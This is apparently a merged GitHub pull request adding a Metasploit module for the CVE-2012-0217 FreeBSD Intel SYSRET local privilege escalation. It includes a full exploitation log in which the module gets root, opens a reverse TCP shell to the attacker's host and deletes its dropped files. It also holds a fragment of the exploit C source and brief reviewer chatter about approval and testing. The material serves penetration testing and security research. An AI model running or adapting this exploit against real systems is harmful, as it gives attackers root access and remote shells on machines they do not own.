### PR TITLE
Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module

### PR DESCRIPTION
**Pull request by bcoles**
Add FreeBSD 9 Intel SYSRET Privilege Escalation module.

Lazy wrapper for ~CurcolHekerLink's~ iZsh's exploit. I realize we already have the `mmap` exploit, which covers FreeBSD 9.0 and 9.1, but it's nice to have options.

The payload isn't strictly required. The exploit upgrades the privileges of the current task, and by the time the payload executes we're already `root`. Given that there's no Meterpreter for BSD, this should never be a problem.

```
  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
  session => 1
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
  lhost => 123.123.123.188
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 123.123.123.188:4444 
  [+] FreeBSD version 9.0-RELEASE appears vulnerable
  [+] System architecture amd64 is supported
  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
  [*] Max line length is 131073
  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
  [*] Max line length is 131073
  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
  [*] 
  [*] [*] Retrieving host information...
  [*]     [+] CPU: GenuineIntel
  [*]     [+] sysname: FreeBSD
  [*]     [+] release: 9.0-RELEASE
  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
  [*]     [+] machine: amd64
  [*] [*] Validating target OS and version...
  [*]     [+] Vulnerable :-)
  [*] [*] Resolving kernel addresses...
  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
  [*]     [+] Resolved Xpage to 0xffffffff80b03240
  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
  [*]     [+] Resolved Xalign to 0xffffffff80b03080
  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
  [*] [*] Setup...
  [*]     [+] Trigger code...
  [*]     [+] Trampoline code...
  [*] [*] Fire in the hole!
  [*] [*] Got root!
  [+] Success! Executing payload...
  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
  [+] Deleted /tmp/.mTaR4rAPd.c
  [+] Deleted /tmp/.mTaR4rAPd
  [+] Deleted /tmp/.LBGkIVh
  id
  uid=0(root) gid=0(wheel) groups=0(wheel)
  uname -a
  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
```

### CODE REVIEW

**Comment by jmartin-r7** [comment]
@msjenkins-r7 test this please.

File: data/exploits/cve-2012-0217/sysret.c [hunk 1]
```diff
@@ -0,0 +1,178 @@
...
+  Xpagep = (uintptr_t)matchsym("Xpage");
+  Xfpup = (uintptr_t)matchsym("Xfpu");
+  Xalignp = (uintptr_t)matchsym("Xalign");
+  Xmchkp = (uintptr_t)matchsym("Xmchk");
+  Xxmmp = (uintptr_t)matchsym("Xxmm");
+}
+
+void trigger()
+{
+  printf("[+] Crotz...\n");
```
[the remark this answers is not in the document]
Comment (wvu-r7) [reply data/exploits/cve-2012-0217/sysret.c]: https://www.urbandictionary.com/define.php?term=crotz

[the remark this answers is not in the document]
Comment (bcoles) [reply data/exploits/cve-2012-0217/sysret.c]: @wvu-r7 you'll have more luck with: https://www.google.com/search?q=define:crotz+slang

**Comment by bcoles** [comment]
Adding `attic` tag pending approval from @iZsh.

**Comment by iZsh** [comment]
Sorry, i hadn't noticed your email. Your fear of my license punishment made my day ;-) 

You have my approval to use my exploit in metasploit.

**Comment by busterb** [comment]
This is the best!

**Comment by busterb** [comment]
Darn it, I started checking this earlier, verified it works, but got distracted before landing. Moving forward with that now. Thanks @bcoles

**Comment by busterb** [comment]
## Release Notes

This adds a local privilege escalation exploit module for a vulnerability in the FreeBSD kernel when running on 64-bit Intel processors, leveraging a mishandled edge cases with the SYSRET instruction.

**Comment by busterb** [comment]
And just as a verification that this does indeed upgrade the privileges of the current task, here's before and after running `bsd/x64/shell_reverse_tcp`

```
%whoami
vagrant
%/tmp/test.elf 
^C
%whoami
root
%
```

**Pull request merged**